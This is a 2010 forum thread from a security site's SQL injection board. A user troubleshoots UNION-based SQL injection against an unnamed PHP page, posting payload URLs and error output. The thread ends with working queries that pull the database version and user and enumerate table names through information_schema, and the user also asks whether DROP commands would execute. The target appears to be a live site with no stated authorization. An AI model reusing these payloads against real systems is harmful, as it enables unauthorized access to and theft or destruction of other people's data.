|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SQL Injection help-- not sure where to go... |
|
Posted: Tue Aug 31, 2010 10:57 pm |
|
|
ir0x |
Beginner |
|
|
Joined: Sep 01, 2010 |
Posts: 2 |
|
|
|
|
|
|
|
Code: | http://site/page.php?id=null union all select 1,2,3,4,5,6,7-- |
Brings me the regular page
Code: | http://site/page.php?id=null union all select 1,2,@@version,4,5,6,7-- |
Gets me
Code: |
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION
|
and trying to use hex(unhex() brings me the normal page as well.
I've also tried convert() as well. No luck. If i use
Code: |
http://site/page.php?id=null union all select 1,2,3,4,5,6,7 from pages--
|
I get
Code: |
Table 'db_name.pages' doesn't exist!
|
Now this gives me the dbname but other than that, am i prone now to guessing? And even if I use union all select to extract info from information schema with tables I know are there it just brings up regular page, if i use a table name non existing it will just throw back the doesnt exist error. So i guess i can use guessing to find it? And if so will commands still be executed such as drop etc? |
|
|
|
|
|
|
|
|
Posted: Wed Sep 01, 2010 1:14 am |
|
|
niailuo |
Beginner |
|
|
Joined: Aug 31, 2010 |
Posts: 2 |
|
|
|
|
|
|
|
Maybe you can use information_schema if the version of db>5?
well ,i'm so sorry i can't speak English very well As i'm a Chinese.
Hope you can add me ,and my ICQ:613592918.
we can study together. |
|
|
|
|
|
|
|
|
Posted: Wed Sep 01, 2010 5:33 pm |
|
|
ir0x |
Beginner |
|
|
Joined: Sep 01, 2010 |
Posts: 2 |
|
|
|
|
|
|
|
niailuo wrote: | Maybe you can use information_schema if the version of db>5?
well ,i'm so sorry i can't speak English very well As i'm a Chinese.
Hope you can add me ,and my ICQ:613592918.
we can study together. |
I was attempting to find the version & user. I also tried using the schema otherwise with no out put, Turns out it was my bad for not nulling value. Thus i was getting normal page.
My bad i solved my issue. Turns out I wasn't nulling the value. So i needed to use
Code: |
page.php?id=null union all select 1,2,concat(unhex(hex(@@version)),unhex(hex(user()))),4--
AND
null union all select 1,2,unhex(hex(table_name)),4 from information_schema.tables--
AND SO ON
|
and will add... |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|